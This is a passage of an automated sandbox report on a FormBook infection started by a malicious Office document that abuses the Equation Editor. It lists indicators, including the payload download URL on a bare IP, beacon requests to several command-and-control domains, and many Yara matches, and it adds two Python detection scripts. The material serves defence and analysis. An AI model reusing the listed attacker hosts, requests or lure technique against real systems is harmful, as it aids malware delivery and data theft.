            Source: explorer.exe, 00000006.00000000.494238454.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
            Source: explorer.exe, 00000006.00000000.490268538.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://www.hotmail.com/oe
            Source: explorer.exe, 00000006.00000000.530481363.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
            Source: explorer.exe, 00000006.00000000.490268538.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt
            Source: explorer.exe, 00000006.00000000.509280979.0000000004513000.00000004.00000001.sdmp | String found in binary or memory: http://www.piriform.com/ccleaner
            Source: explorer.exe, 00000006.00000000.490268538.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://www.windows.com/pctv.
            Source: explorer.exe, 00000006.00000000.498056814.0000000000255000.00000004.00000020.sdmp | String found in binary or memory: https://support.mozilla.org
            Source: explorer.exe, 00000006.00000000.498056814.0000000000255000.00000004.00000020.sdmp | String found in binary or memory: https://www.mozilla.org
            Source: explorer.exe, 00000006.00000000.498056814.0000000000255000.00000004.00000020.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\15A5C04C.emf
            Source: unknown | DNS traffic detected: queries for: www.orphe.biz
            Source: global traffic | HTTP traffic detected: GET /1155/vbc.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 198.23.213.59 | Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET /i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=oQMs787eFXVjqrc0kpDhsTH4zTzevw4glhch4r9T7Ws8YTYXIREY3A8O8bSOutLAC2pWew== HTTP/1.1 | Host: www.orphe.biz | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (non-printable)
            Source: global traffic | HTTP traffic detected: GET /i5nb/?7nqdxT7p=deof+8h2cV1ZhVyhzrGI39GlLFFvVq6Cbv4jXvKqou5r7IRZVEd6lg8tdgMKHVBHJLPsEg==&hPGx3Z=4ha06H5pmr HTTP/1.1 | Host: www.circlessalaries.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (non-printable)
            Source: global traffic | HTTP traffic detected: GET /i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=1q0oPF09A/aJAPsKPuHQBkHWjjwJ/Gn81frD7rqKWOkW4wBsfhpWEnMiYvQLBvsNHCkSDA== HTTP/1.1 | Host: www.ylhwcl.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (non-printable)
            Source: global traffic | HTTP traffic detected: GET /i5nb/?7nqdxT7p=mP9GS3thMR3+ARMxpcHmObplP0vLxCSJ1Uc4SKl6p1x9FFB9D/wfcJtU5Ejvu094ffKQCA==&hPGx3Z=4ha06H5pmr HTTP/1.1 | Host: www.terapiaholisticaemformacao.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (non-printable)
            Source: global traffic | HTTP traffic detected: GET /i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=Sj6KkXOpjD24waER2SO9qkxuDKT2nEessjMBu43SnBr3kTZ7jjbG3Rbf9Jyaa70FTQT3zw== HTTP/1.1 | Host: www.ecommerceoptimise.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (non-printable)
            Source: global traffic | HTTP traffic detected: GET /i5nb/?7nqdxT7p=XDk63H3qWl+RMbiQoIY1xy2xxu1qCgv9HRxghgT+pSptcjNmJSn834JM0tAFFJwKE7XnKA==&hPGx3Z=4ha06H5pmr HTTP/1.1 | Host: www.integratedheartspsychology.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (non-printable)
            Source: global traffic | HTTP traffic detected: GET /i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=0CWnzW05hIAETNGkljJOZJd5wMvHMv5oC+B2C7oDP+/j/H/Y+u+MlAecVwZThd0hAeRTKw== HTTP/1.1 | Host: www.bjbwx114.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (non-printable)
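            The HTTP entries above carry two signals a network analyst can key on. The second-stage executable is fetched from a bare IP address (198.23.213.59) with no hostname to resolve, which is why the sandbox logs those connections as TCP traffic without a corresponding DNS query. The GETs that follow share one path (/i5nb/), one pair of opaque parameter names (hPGx3Z and 7nqdxT7p, in alternating order) and a seven-NUL-byte body across seven unrelated hosts; FormBook is documented to hold a list of domains in its configuration and to beacon to them in turn, most of them decoys, which is what produces that fan-out. The Python below is an added detection example written for this page, not code from the report or from the sandbox vendor. Its request list is constructed from the entries above with query values shortened, and the final benign request is invented as a control.

```python
"""Two network checks for the behaviour logged above (added example for this
page; not part of the sandbox report):
  1. an executable fetched from a bare-IP host, i.e. a connection that needs
     no DNS query, the signal behind "TCP traffic detected without
     corresponding DNS query";
  2. beacon fan-out: the same URI path, the same set of query-parameter
     names and the same tiny body sent to several unrelated hosts."""
import ipaddress
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

EXECUTABLE_SUFFIXES = (".exe", ".dll", ".scr", ".ps1", ".vbs", ".js")
FORMBOOK_BODY = b"\x00" * 7  # the "Data Raw: 00 00 00 00 00 00 00" body seen above

# Constructed from the report's requests: (Host header, request target, body).
# Query values are shortened; parameter names and hosts are as listed above.
# The last entry is an invented benign request that must not be flagged.
SAMPLE_REQUESTS = [
    ("198.23.213.59", "/1155/vbc.exe", b""),
    ("www.orphe.biz", "/i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=oQMs787eFXVjqrc0kpDh==", FORMBOOK_BODY),
    ("www.circlessalaries.com", "/i5nb/?7nqdxT7p=deof+8h2cV1ZhVyhzrGI39Gl==&hPGx3Z=4ha06H5pmr", FORMBOOK_BODY),
    ("www.ylhwcl.com", "/i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=1q0oPF09A/aJAPsKPuHQ==", FORMBOOK_BODY),
    ("www.terapiaholisticaemformacao.com", "/i5nb/?7nqdxT7p=mP9GS3thMR3+ARMxpcHm==&hPGx3Z=4ha06H5pmr", FORMBOOK_BODY),
    ("www.ecommerceoptimise.com", "/i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=Sj6KkXOpjD24waER2SO9==", FORMBOOK_BODY),
    ("www.integratedheartspsychology.com", "/i5nb/?7nqdxT7p=XDk63H3qWl+RMbiQoIY1==&hPGx3Z=4ha06H5pmr", FORMBOOK_BODY),
    ("www.bjbwx114.com", "/i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=0CWnzW05hIAETNGkljJO==", FORMBOOK_BODY),
    ("www.example.org", "/index.html", b""),
]


def is_ip_literal(host: str) -> bool:
    """True when the Host header is a raw IPv4/IPv6 address. No DNS lookup
    precedes such a connection, which is the condition the report keys on."""
    try:
        ipaddress.ip_address(host.strip("[]"))
        return True
    except ValueError:
        return False


def find_ip_literal_downloads(requests):
    """Return (host, path) for every executable fetched from a bare-IP host."""
    hits = []
    for host, target, _body in requests:
        path = urlsplit(target).path
        if is_ip_literal(host) and path.lower().endswith(EXECUTABLE_SUFFIXES):
            hits.append((host, path))
    return hits


def beacon_signature(target: str, body: bytes):
    """Reduce a request to what a bot keeps constant across hosts: the path,
    the *set* of parameter names (their order alternates in the report) and
    the exact body bytes. Parameter values are ignored; they change per beacon."""
    parts = urlsplit(target)
    names = frozenset(k for k, _ in parse_qsl(parts.query, keep_blank_values=True))
    return (parts.path, names, body)


def find_beacon_clusters(requests, min_hosts: int = 3):
    """Group requests by signature and return {signature: sorted hosts} for
    signatures seen against at least min_hosts distinct hosts. Legitimate
    sites do not share a path, opaque parameter names and a NUL-byte body
    across unrelated domains; a bot cycling through a domain list does."""
    by_sig = defaultdict(set)
    for host, target, body in requests:
        by_sig[beacon_signature(target, body)].add(host)
    return {sig: sorted(hosts) for sig, hosts in by_sig.items() if len(hosts) >= min_hosts}


if __name__ == "__main__":
    for host, path in find_ip_literal_downloads(SAMPLE_REQUESTS):
        print(f"[download from bare IP] http://{host}{path}")
    for (path, names, body), hosts in find_beacon_clusters(SAMPLE_REQUESTS).items():
        print(f"[beacon fan-out] path={path} params={sorted(names)} body={body!r} hosts={len(hosts)}")
```

            Run as a script it reports the vbc.exe download and one beacon cluster of seven hosts. In production the same tuples come from a proxy log or Zeek http.log (host, uri, request body); the min_hosts threshold is the knob to tune, since a CDN or an ad network can legitimately repeat one path across a handful of hostnames, but it will not repeat a fixed binary body with it.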

            E-Banking Fraud:

            Yara detected FormBook
            Source: Yara match | File source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.2.vbc.exe.37b2e80.5.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.2.vbc.exe.375be60.6.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000000.481792338.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000000.511908771.000000000921C000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.686600488.0000000000690000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000000.481476255.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000000.503980554.000000000921C000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.520415665.0000000000260000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.489221730.0000000003619000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.686548955.0000000000430000.00000040.00020000.sdmp, type: MEMORY

            System Summary:

            Malicious sample detected (through community Yara rule)
            Source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
            Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
            Source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
            Source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
            Source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
            Source: 4.2.vbc.exe.37b2e80.5.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 4.2.vbc.exe.37b2e80.5.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
            Source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
            Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
            Source: 4.2.vbc.exe.375be60.6.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 4.2.vbc.exe.375be60.6.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000000.481792338.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000000.481792338.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000000.511908771.000000000921C000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000006.00000000.511908771.000000000921C000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
            Source: 00000007.00000002.686600488.0000000000690000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000007.00000002.686600488.0000000000690000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000000.481476255.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000000.481476255.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
            Source: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000000.503980554.000000000921C000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000006.00000000.503980554.000000000921C000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.520415665.0000000000260000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.520415665.0000000000260000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
            Source: 00000004.00000002.489221730.0000000003619000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000004.00000002.489221730.0000000003619000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
            Source: 00000007.00000002.686548955.0000000000430000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000007.00000002.686548955.0000000000430000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
            Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
            Source: Screenshot number: 4 | Screenshot OCR: Enable Content from the yellow bar above 21 ^ 22 23 24 m. 25 m 26 27 m 28 29 ' 30 3
            Source: Screenshot number: 8 | Screenshot OCR: Enable Content from the yellow bar above 21 ^ 22 23 24 m. 25 m 26 27 m 28 29 ' 30 3
            Office equation editor drops PE file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
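            EQNEDT32.EXE is the Equation Editor COM server. Office starts it out of process, so a rule that keys on the Office application as the parent misses it; the robust anchor is the image name itself. Its job is to render OLE equation objects, so under normal use it has no reason to write executables anywhere, let alone into C:\Users\Public or the Content.IE5 cache, which is what the two file-create events above record (the cache copy is the URLDownloadToFile side effect, the Public copy is the staged payload). The Python below is an added host-side detection example for this page, not code from the report and not the text of any Sigma rule; its events are constructed using Sysmon Event ID 11 field names (Image, TargetFilename), two of them reproducing the paths above and the rest invented as benign controls.

```python
"""Flag file-create events where EQNEDT32.EXE writes an executable into a
user-writable staging location. Added example for this page; the event
shape follows Sysmon Event ID 11 (FileCreate), the events are constructed."""
import ntpath

EXEC_SUFFIXES = (".exe", ".dll", ".scr", ".com", ".pif")

# Lower-cased path fragments a document-rendering helper should never be
# writing executables under. Matched as substrings of the target path.
STAGING_DIRS = (
    "c:\\users\\public\\",
    "\\content.ie5\\",
    "\\appdata\\local\\temp\\",
    "\\appdata\\roaming\\",
)

# Constructed events. The first two reproduce the report's drops; the
# remaining three are benign activity that must not be flagged.
SAMPLE_EVENTS = [
    {"Image": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "TargetFilename": r"C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe"},
    {"Image": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "TargetFilename": r"C:\Users\Public\vbc.exe"},
    {"Image": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "TargetFilename": r"C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\15A5C04C.emf"},
    {"Image": r"C:\Windows\explorer.exe",
     "TargetFilename": r"C:\Users\Public\notes.txt"},
    {"Image": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "TargetFilename": r"C:\Users\user\AppData\Local\Temp\eq123.tmp"},
]


def is_eqnedt_exec_drop(event) -> bool:
    """True when the writing process is EQNEDT32.EXE (matched on image name,
    not parent, because Office launches it via COM), the file has an
    executable extension and it lands in one of the staging directories."""
    image = ntpath.basename(event["Image"]).lower()
    target = event["TargetFilename"].lower()
    return (image == "eqnedt32.exe"
            and target.endswith(EXEC_SUFFIXES)
            and any(d in target for d in STAGING_DIRS))


def find_eqnedt_drops(events):
    """Return the TargetFilename of every matching event, in input order."""
    return [e["TargetFilename"] for e in events if is_eqnedt_exec_drop(e)]


if __name__ == "__main__":
    for path in find_eqnedt_drops(SAMPLE_EVENTS):
        print(f"[EQNEDT32 executable drop] {path}")
```

            The extension and directory filters keep the rule quiet on the .tmp and .emf scratch files Office components legitimately create; if the environment still has Equation Editor installed at all, an EQNEDT32.EXE file-create of any kind outside its own scratch files is worth a ticket, since Microsoft removed the component in January 2018 and nothing should be exercising it.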
            Source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE | Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 4.2.vbc.exe.37b2e80.5.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 4.2.vbc.exe.37b2e80.5.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE | Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 4.2.vbc.exe.375be60.6.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 4.2.vbc.exe.375be60.6.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000000.481792338.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000000.481792338.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000000.511908771.000000000921C000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000000.511908771.000000000921C000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
